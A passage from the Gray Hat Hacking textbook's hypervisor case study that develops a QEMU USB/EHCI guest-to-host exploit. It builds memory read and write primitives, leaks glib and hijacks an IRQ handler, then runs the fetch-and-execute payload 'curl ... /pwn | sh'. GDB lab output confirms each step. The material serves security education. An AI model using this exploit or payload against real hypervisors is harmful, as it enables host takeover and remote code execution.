              To craft our first primitive, let’s start by looking at the USBDevice structure (defined in
              /qemu/include/hw/usb.h). In particular, we’ll look at the fields right after data_buf that
              can be smashed with the overflow:
              uint8_t setup_buf[8];
              uint8_t data_buf[4096];
              int32_t remote_wakeup;
              int32_t setup_state;
              int32_t setup_len;
              int32_t setup_index;

                We can control setup_index and setup_len and always set setup_state to
              SETUP_STATE_DATA. Remember that data is copied in the following way:
              usb_packet_copy(p, s->data_buf + s->setup_index, len);
              s->setup_index += len;

                By controlling s->setup_index, we can turn the buffer overflow into a ±2GB relative
              write from the address of s->data_buf. Based on our trigger_overflow method, we can
              build the relative_write primitive in the following way (/labs/qemu_xpl.py):
                     def overflow_data(self):
                         return CStruct(
                             'remote_wakeup' / c.Int32sl,
                             'setup_state'   / c.Int32sl,
                             'setup_len'     / c.Int32sl,
                             'setup_index'   / c.Int32sl
                         )
                                                                     Chapter 26: Hacking Hypervisors Case Study
    def overflow_build(self, overflow_len, setup_len, setup_index):❶
        return self.overflow_data().build({
            'remote_wakeup': 0,
            'setup_state':   2, # SETUP_STATE_DATA
            'setup_len':     setup_len,
            'setup_index':   setup_index – overflow_len❷
        })

    def relative_write(self, offset, data: IOVector):❸
        data_buf_len = USBDevice.data_buf.sizeof()
        overflow_len = data_buf_len + self.overflow_data().sizeof()
        setup_len = data.size() + offset
        self.trigger_overflow(
            overflow_len,
            self.overflow_build(overflow_len, setup_len, offset)
        )
        self.usb_out(data)

   First, we have the helper method overflow_build ❶ to build the binary data needed
to smash s->setup_len and s->setup_index. The overflow_len argument is required
to adjust s->setup_index ❷, which is incremented after the call to usb_packet_copy.
Our relative_write ❸ primitive takes a relative offset to s->data_buf (either positive or
negative) and the data (IOVector) to write.

Relative Read Primitive
A read primitive requires sending an IN packet. The QEMU function that processes
IN packets is do_token_in (defined in /qemu/hw/usb/core.c):
static void do_token_in(USBDevice *s, USBPacket *p)
{
...omitted for brevity…

                                                                                                                  PART V
    switch(s->setup_state) {
...omitted for brevity…
    case SETUP_STATE_DATA:
        if (s->setup_buf[0] & USB_DIR_IN) {❷
            int len = s->setup_len - s->setup_index;
            if (len > p->iov.size) {
                len = p->iov.size;
            }
            usb_packet_copy(p, s->data_buf + s->setup_index, len);❶
            s->setup_index += len;
            if (s->setup_index >= s->setup_len) {
                s->setup_state = SETUP_STATE_ACK;
            }
            return;
        }

   The call to usb_packet_copy ❶ is reached if USB_DIR_IN is present in
s->setup_buf[0] ❷. Because we used an OUT packet to corrupt s->setup_index, this
is not possible.
   At this point, it is too late to send more SETUP packets in an attempt to set
USB_DIR_IN because the state was already corrupted; however, we can pass a
Gray Hat Hacking: The Ethical Hacker’s Handbook
              negative offset to relative_write and smash s->setup_buf. Let’s see how to implement a
              relative_read (/labs/qemu_xpl.py) following this approach:
                     def relative_read(self, offset, length):
                         data_buf_len = USBDevice.data_buf.sizeof()
                         overflow_len = data_buf_len + self.overflow_data().sizeof()
                         setup_buf = self.request(ehci.USB_DIR_IN, 0, 0, 0, 0)❷
                         setup_buf_len = len(setup_buf)
                         data = IOVector([❶
                             Chunk(setup_buf),
                             Chunk(
                                 self.overflow_build(❸
                                     overflow_len,
                                     offset + length,
                                     offset - setup_buf_len
                                 ),
                                 offset=data_buf_len + setup_buf_len
                             )])
                         self.relative_write(-setup_buf_len, data)❹
                         return self.usb_in(length)

                 The relative_read primitive is constructed by preparing data ❶ to both underflow
              and overflow s->data_buf in a single shot. The underflow slice (setup_buf) ❷ smashes
              s->setup_buf contents to set USB_DIR_IN, while the overflow slice ❸ smashes
              s->setup_len and s->setup_index. Then relative_write ❹ is used to corrupt the state,
              and we can now send an IN packet to leak data.

              Lab 26-4: Debugging the Relative Read Primitive

              Let’s use the debugger to see how the state corruption is achieved:
              ┌──(root ghh6)-[/labs]
              └─# nohup python3 qemu_xpl.py 2> /dev/null &
              [1] 328
              ┌──(root ghh6)-[/labs]
              └─# gdb -q
              (gdb) set pagination off
              (gdb) handle SIGUSR1 nostop noprint
              Signal        Stop      Print   Pass to program Description
              SIGUSR1       No        No      Yes             User defined signal 1
              (gdb) target remote localhost:2345
              0x00007f2c37c67090 in _start () from target:/lib64/ld-linux-x86-64.so.2
              (gdb) b usb_packet_copy if bytes > 0x1000
              Breakpoint 1 at 0x5613f085e6a5: file /qemu/hw/usb/core.c, line 588.
              (gdb) c
              Continuing.
              ...omitted…
              Thread 1 "qemu-system-x86" hit Breakpoint 1, usb_packet_copy
              (p=0x5613f28eb630,
              ptr=0x5613f364d09c, bytes=4112) at /qemu/hw/usb/core.c:588
              588         QEMUIOVector *iov = p->combined ? &p->combined->iov : &p->iov;
              (gdb) finish
              Run till exit from #0 usb_packet_copy (p=0x5613f28eb630, ptr=0x5613f364d09c,
              bytes=4112) at /qemu/hw/usb/core.c:588
              do_token_out (s=0x5613f364cfb0, p=0x5613f28eb630) at /qemu/hw/usb/core.c:244
                                                                      Chapter 26: Hacking Hypervisors Case Study
244                  s->setup_index += len;
(gdb) print s->setup_state
$1 = 2
(gdb) print s->setup_len
$2 = 4112❶
(gdb) print s->setup_index
$3 = -4120❷
(gdb) c
Continuing.
Thread 1 "qemu-system-x86" hit Breakpoint 1, usb_packet_copy
(p=0x5613f28eb630,
ptr=0x5613f364d094, bytes=4120) at /qemu/hw/usb/core.c:588
588          QEMUIOVector *iov = p->combined ? &p->combined->iov : &p->iov;
(gdb) finish
Run till exit from #0 usb_packet_copy (p=0x5613f28eb630, ptr=0x5613f364d094,
bytes=4120) at /qemu/hw/usb/core.c:588
do_token_out (s=0x5613f364cfb0, p=0x5613f28eb630) at /qemu/hw/usb/core.c:244
244                  s->setup_index += len;
(gdb) print s->setup_len
$4 = 5364
(gdb) print s->setup_index
$5 = -4356
(gdb) print s->setup_buf[0]
$6 = 128 '\200'❸

             TIP Use GDB to test and examine all exploit primitives and display the
             contents of USBDevice in the same way we just did here.

   In the debugging session, we can see that the buffer overflow is used to set
s->setup_len ❶ to 0x1010 bytes and s->setup_index ❷ to -0x1018, which, after
adding the length, is -8 (that’s the start of s->setup_buf). Then the arbitrary write sets

                                                                                                                   PART V
s->setup_len and s->setup_index with the actual length and offset we want to read
from, but also sets s->setup_buf[0] ❸ to 0x80 (USB_DIR_IN), so now we can send
an IN packet to read data.

Arbitrary Read
To turn the relative read into an arbitrary read, we need the address of s->data_buf.
We can obtain the address of s (USBDevice) from the device field of the endpoint zero
structure (USBEndpoint) at s->ep_ctl. This structure is defined in /qemu/include/
hw/usb.h:
struct USBEndpoint {
    uint8_t nr;
    uint8_t pid;
    uint8_t type;
    uint8_t ifnum;
    int max_packet_size;
    int max_streams;
    bool pipeline;
    bool halted;
    USBDevice *dev;
    QTAILQ_HEAD(, USBPacket) queue;
};
Gray Hat Hacking: The Ethical Hacker’s Handbook
                 If we leak the whole USBDevice structure (in the future, we will need more from this
              structure), we can use s->ep_ctl.dev to calculate s->data_buf. The very first thing our
              exploit will do is to leak this structure (/labs/qemu_xpl.py):
                     def on_boot(self, body):
                         super().on_boot(body)
                         self.port_reset()
                         self.usb_dev = USBDevice.parse(
                             self.relative_read(
                                 USBDevice.data_buf._offset * -1,
                                 USBDevice.sizeof()
                             ))

                  Then turning the relative read into an arbitrary read is straightforward:
                     def addr_of(self, field):❶
                         return self.usb_dev.ep_ctl.dev + field._offset

                     def arbitrary_read_near(self, addr, data_len):
                         delta = self.addr_of(USBDevice.data_buf)❷
                         return self.relative_read(addr - delta, data_len)

                 The method addr_of ❶ is used to resolve the absolute address of any field belonging
              to USBDevice, so at arbitrary_read_near ❷ we use it to get the address of s->data_buf.
              Keep in mind that this primitive is still limited to a ±2GB range. That’s why the method’s
              name includes the “near” suffix.

              Full Address-Space Leak Primitive
              If our intention is to build a ROP or ret2lib that works independently of knowing
              the binary’s layout, we will need a read primitive capable of accessing the full address
              space. One way to accomplish this is by manipulating a pointer used by some device’s
              standard request that returns data to the host. A good standard request candidate is
              GET_DESCRIPTOR. When we pass USB_DT_STRING in the request’s wValue, it
              is processed by usb_desc_string (defined at /qemu/hw/usb/desc.c):
              const char *usb_desc_get_string(USBDevice *dev, uint8_t index)❶
              {
                  USBDescString *s;
                  QLIST_FOREACH(s, &dev->strings, next) {❷
                      if (s->index == index) {
                          return s->str;
                      }
                  }
                  return NULL;
              }
              int usb_desc_string(USBDevice *dev, int index, uint8_t *dest, size_t len)
              {
              ...omitted for brevity…
                  str = usb_desc_get_string(dev, index);
                  if (str == NULL) {
                      str = usb_device_get_usb_desc(dev)->str[index];
                      if (str == NULL) {
                          return 0;
                      }
                  }
                                                                     Chapter 26: Hacking Hypervisors Case Study
    bLength = strlen(str) * 2 + 2;
    dest[0] = bLength;
    dest[1] = USB_DT_STRING;
    i = 0; pos = 2;
    while (pos+1 < bLength && pos+1 < len) {❸
        dest[pos++] = str[i++];
        dest[pos++] = 0;
    }
    return pos;
}

   The usb_desc_string function calls usb_desc_get_string ❶ to iterate over the
dev->strings list ❷ until index is found. Then, usb_desc_string copies the contents of
the returned pointer until a null byte is found or a maximum buffer size is reached ❸.
   It is possible to overwrite the list head at dev->strings and make it point to a
USBDescString object created by us. Later, we can send a GET_DESCRIPTOR
request and return data from our controlled s->str pointer. A good spot to place our fake
USBDescString object is inside s->data_buf. The contents can be written in a single
shot when triggering the buffer overflow. To do so, some changes are required in the
relative_write (/labs/qemu_xpl.py) primitive, so let’s write a new one:
    def relative_write_2(self, offset, data, data_buf_contents):
        data_buf_len = USBDevice.data_buf.sizeof()
        overflow_len = data_buf_len + self.overflow_data().sizeof()
        setup_len = len(data) + offset
        self.setup(self.request(0, 0, 0, 0, 0x100))
        self.setup(self.request(0, 0, 0, 0, overflow_len))
        data_buf_contents.append(
            self.overflow_build(overflow_len, setup_len, offset),
            offset=data_buf_len
        )
        self.usb_out(data_buf_contents)❶

                                                                                                                  PART V
        self.usb_out(IOVector([Chunk(data)]))

    def arbitrary_write(self, addr, data, data_buf_contents):
        delta = self.addr_of(USBDevice.data_buf)
        self.relative_write_2(addr - delta, data, data_buf_contents)

   Now, the arbitrary write takes a new argument (data_buf_contents), which is an
IOVector passed to usb_out ❶ when triggering the buffer overflow. This way, we can
place extra data into s->data_buf.
   It could be the case where we know beforehand multiple addresses we want to leak
from. Instead of creating a single USBDescString and calling the primitive once for each
address, we can take advantage of the index argument of usb_desc_string:
    def descr_build(self, address_list, start_addr):❶
         offset = start_addr - self.addr_of(USBDevice.data_buf)
         next = start_addr
         data = b''
         for i, address in enumerate(address_list, 1):
             next += USBDescString.sizeof()
             data += USBDescString.build(
                 {'index': i, 'str': address, 'next': next}❷
             )
Gray Hat Hacking: The Ethical Hacker’s Handbook
                            if len(data) + offset > USBDevice.data_buf.sizeof():
                                ExploitError('address list too large')

                            return IOVector([Chunk(data, offset)])

                     def leak_multiple(self, address_list):❸
                         start_addr = self.addr_of(USBDevice.data_buf) + 256
                         self.arbitrary_write(❹
                             self.addr_of(USBDevice.strings),
                             start_addr.to_bytes(8, 'little'),
                             self.descr_build(address_list, start_addr)
                         )
                         data_list = (self.desc_string(i) for i in count(1)) ❺
                         return zip(address_list, data_list)

                  The auxiliary method descr_build ❶ takes a list of addresses and produces a linked
              list of USBDescString elements, and each element ❷ has an index number assigned to a
              particular address. The second argument (start_addr) is an address inside s->data_buf.
              The new leak_multiple ❸ primitive builds this linked list and overwrites s->strings
              ❹ with the address of the list’s head. The linked list starts at &s->data_buf[256],
              leaving the first 256 bytes of the buffer free for the contents returned by desc_string.
              Finally, desc_string is repeatedly called for every index number ❺ associated to one
              list’s addresses to leak.

                                 NOTE desc_string is implemented in ehci.py and is used to send the
                                 GET_DESCRIPTOR request with USB_DT_STRING and index arguments.

              Module Base Leak
              Leaking the base address of a module is straightforward if we have a function pointer. We
              just scan down memory until we find the ELF header. Let’s add a leak_module_base
              primitive (/labs/qemu_xpl.py):
                     def leak_module_base(self, fptr):
                         top_addr = fptr & ~0xfff
                         while True:
                             bottom_addr = top_addr - 0x1000 * 160
                             addr_list = list(range(top_addr, bottom_addr, -0x1000))

                                  for addr, data in self.leak_multiple(addr_list):
                                      print(f'[I] scan: {addr:016x}', end='\r')
                                      if data.startswith(b'\x7fELF\x02\x01\x01'):
                                          print(f'\n[+] ELF header found at {addr:#x}')
                                          return addr

                                  top_addr = addr_list[-1]

                This implementation takes advantage of leak_multiple to leak the contents of
              160 addresses per iteration.
                                                                           Chapter 26: Hacking Hypervisors Case Study
RET2LIB
The easiest way to complete the exploitation process is by finding a function like “system.”
One option is to find a function pointer in QEMU’s binary, use leak_module_base, and
walk the ELF information to find “libc.so” and then repeat the process to find “system.”
Finding such function pointers is not hard at all; for example, we have some of them in
USBPortOps (/qemu/include/hw/usb.h). Let’s see what these pointers look like in GDB.

Lab 26-5: Finding Function Pointers with GDB

┌──(root ghh6)-[/labs]
└─# python3 trigger.py &
[2] 558
┌──(root ghh6)-[/labs]
└─# gdb -q
(gdb) set pagination off
(gdb) handle SIGUSR1 nostop noprint
Signal        Stop      Print   Pass to program Description
SIGUSR1       No        No      Yes             User defined signal 1
(gdb) target remote localhost:2345
…
0x00007f019d703090 in _start () from target:/lib64/ld-linux-x86-64.so.2
(gdb) b do_token_out if s->setup_len > 0x1000
Breakpoint 1 at 0x56545d7c96b9: file /qemu/hw/usb/core.c, line 225.
(gdb) c
Continuing.
…
Thread 1 "qemu-system-x86" hit Breakpoint 1, do_token_out (s=0x5654602cffb0,
p=0x56545f56e630) at /qemu/hw/usb/core.c:225
225         assert(p->ep->nr == 0);
(gdb) print *s->port.ops
$1 = {attach = 0x56545d7e066d <ehci_attach>, detach = 0x56545d7e0778 <ehci_detach>,

                                                                                                                        PART V
child_detach = 0x56545d7e08b9 <ehci_child_detach>, wakeup = 0x56545d7e096a <ehci_
wakeup>, complete = 0x56545d7e1c45 <ehci_async_complete_packet>}

  However, a more interesting option is the “free” function pointer present in the Object
header of USBDevice:
(gdb) print s->qdev.parent_obj
$2 = {class = 0x56545f3ef0b0, free = 0x7f019d3ebe20 <g_free>, properties =
0x565460243c00, ref = 2, parent = 0x56545f4e3c60}

             TIP   Don’t close the GDB session yet. We will keep using it later in this section.

  The pointer corresponds to the glib’s function g_free. It is faster to find glib’s base
address from this function rather than scanning a massive binary like qemu-system-x86.
Some of the functions exported by glib provide system-like functionality; one is
g_spawn_command_line_async.
Gray Hat Hacking: The Ethical Hacker’s Handbook
                 To avoid the boring task of ELF header parsing, let’s use pwntools.5 The module
              requires us to supply a leak primitive, so we can just write one (qemu_xpl.py):
                     def leak_one(self, addr):
                         _, data = next(self.leak_multiple([addr]))
                         return data

                  Now we are ready to resolve g_spawn_command_line_async:
                            fptr = self.usb_dev.qdev.parent_obj.free
                            d = dynelf.DynELF(self.leak_one, self.leak_module_base(fptr))
                            ret2func = d.lookup('g_spawn_command_line_async')

                 All we need now is to find a pointer to a function where we can control the first
              function argument. Let’s begin our search from the USBPort (/qemu/include/hw/usb.h)
              structure:
              /* USB port on which a device can be connected */
              struct USBPort {
                  USBDevice *dev;
                  int speedmask;
                  int hubcount;
                  char path[16];
                  USBPortOps *ops;
                  void *opaque;
                  int index; /* internal port index, may be used with the opaque */
                  QTAILQ_ENTRY(USBPort) next;
              };

                When the EHCI controller is initialized, each port is registered by a call to the
              usb_register_port function (defined at /qemu/hw/usb/bus.c). This function initializes a
              USBPort object and inserts it at the tail of the linked list:
              void usb_register_port(USBBus *bus, USBPort *port, void *opaque, int index,
              USBPortOps *ops, int speedmask)
              {
                  usb_fill_port(port, opaque, index, ops, speedmask);
                  QTAILQ_INSERT_TAIL(&bus->free, port, next);
                  bus->nfree++;
              }

                Controller ports are registered by usb_ehci_realize (defined at /qemu/hw/usb/
              hcd-ehci.c):
              void usb_ehci_realize(EHCIState *s, DeviceState *dev, Error **errp)
              {
              ...omitted for brevity…
                  for (i = 0; i < s->portnr; i++) {
                      usb_register_port(&s->bus, &s->ports[i], s, i, &ehci_port_ops,
                                        USB_SPEED_MASK_HIGH);

                 We can see that, in this case, port->opaque corresponds to the EHCI controller’s
              state (EHCIState). One of the first fields we can find in this structure is a pointer to the
              IRQState (/qemu/hw/core/irq.c). Let’s dump its contents from our previously opened
              GDB session.
                                                                    Chapter 26: Hacking Hypervisors Case Study

Lab 26-6: Displaying IRQState with GDB

(gdb) print *((EHCIState*)s->port->opaque)->irq
$3 = {parent_obj = {class = 0x56545f38af40, free = 0x7f019d3ebe20 <g_free>,
properties = 0x565460272f00, ref = 1, parent = 0x0},
handler = 0x56545d769bda <pci_irq_handler>,
opaque = 0x565460249cd0, n = 3}

  Here, irq->handler points to the generic PCI handler (pci_irq_handler at /qemu/
hw/pci/pci.c), and the other two fields, irq->opaque and irq->n, are passed to it:
static void pci_irq_handler(void *opaque, int irq_num, int level)

   The IRQ handler will be eventually triggered by ehci_raise_irq, so the only thing we
need to do is to replace irq->handler with the address of g_spawn_command_line_async
and irq->opaque with a string containing an arbitrary command line. Let’s add this as
the final step of our exploit code in qemu_xpl.py:
        port = USBPort.parse(❶
            self.arbitrary_read_near(
                self.usb_dev.port, USBPort.sizeof()
            ))
        ehci_state = EHCIState.parse(❷
            self.arbitrary_read_near(
                port.opaque, EHCIState.sizeof()
            ))
        irq_state = IRQState.parse(❸
            self.arbitrary_read_near(
                ehci_state.irq, IRQState.sizeof()

                                                                                                                 PART V
            ))
        cmd = b'sh -c "curl -sf http://localhost:8000/pwn | sh"\0'
        print(f'[+] Executing: {cmd[:-1].decode()}')
        self.arbitrary_write(
            ehci_state.irq,
            IRQState.build({
                'parent_obj': irq_state.parent_obj,
                'handler': ret2func,❹
                'opaque': self.addr_of(USBDevice.data_buf),❺
                'n': 0
            }),
            IOVector([Chunk(cmd)])❻
        )

   The code begins by leaking s->port ❶, port->opaque ❷ (EHCIState), and
ehci_state->irq ❸. A call to arbitrary_write replaces the current IRQState object with
a new one, with irq->handler pointing to g_spawn_command_line_async ❹, and
irq->opaque pointing to s->data_buf ❺. The command line is passed in the third argu-
ment of arbitrary_write ❻, getting written into s->data_buf.
Gray Hat Hacking: The Ethical Hacker’s Handbook

              Lab 26-7: Launching the Exploit

              Let’s test the exploit by setting up a web server serving a “pwn” file that merely creates a
              “/tmp/pwned” file:
              ┌──(root ghh6)-[/labs]
              └─# echo "touch /tmp/pwned" > pwn
              ┌──(root ghh6)-[/labs]
              └─# python3 -m http.server 8000 > /dev/null &
              [1] 9
              ┌──(root ghh6)-[/labs]
              └─# python3 qemu_xpl.py nodebug
              PRINT: kmain at 0x0000000000401363

              [+] ELF header found at 0x7f2dc13e2000
              [!] No ELF provided. Leaking is much faster if you have a copy of the ELF
              being leaked.
              [-] Resolving b'g_spawn_command_line_async': Could not find tag DT_DEBUG
              [*] No linkmap found
              [*] Trying remote lookup
              [*] .gnu.hash/.hash, .strtab and .symtab offsets
              [*] Found DT_GNU_HASH at 0x7f2dc150e700
              [*] Found DT_STRTAB at 0x7f2dc150e710
              [*] Found DT_SYMTAB at 0x7f2dc150e720
              [*] .gnu.hash parms
              [*] hash chain index
              [*] hash chain
              [+] 0x7f2dc1483a30
              [+] Executing: sh -c "curl -sf http://localhost:8000/pwn | sh"
              [I] Press enter to exit
               127.0.0.1 - - [25/Jul/2021 01:44:50] "GET /pwn HTTP/1.1" 200 -
              ┌──(root ghh6)-[/labs]
              └─# ls /tmp/
              pwned

                 Porting this exploit to a general-purpose guest OS (like Linux) is left as an exercise for
              the reader.

              Summary
              This chapter introduced you to practical hypervisor exploitation in one of its simplest
              forms: a user-mode component vulnerability. The exploit development process was cov-
              ered from the beginning, starting at the root-cause analysis of the vulnerability. This was
              followed by the development of a trigger and a series of primitives. New primitives were
              built on top of the previous ones, giving you increasing control over the target. The final
              result was a fully working exploit that can execute arbitrary user-mode code in the host.
                                                                Chapter 26: Hacking Hypervisors Case Study
For Further Reading
“USB 2.0 Specification” www.usb.org/document-library/usb-20-specification
“Enhanced Host Controller Interface for Universal Serial Bus” www.intel.com/
content/dam/www/public/us/en/documents/technical-specifications/ehci-specification-
for-usb.pdf

References
   1. “CVE-2020-14364,” https://access.redhat.com/security/cve/cve-2020-14364.
   2. “GitHub REST API,” https://docs.github.com/en/rest.
   3. “jq,” https://stedolan.github.io/jq/.
   4. “gdbserver(1)—Linux manual page,” https://man7.org/linux/man-pages/man1/
      gdbserver.1.html.
   5. “Pwntools,” https://docs.pwntools.com/en/stable/.

                                                                                                             PART V
This page intentionally left blank
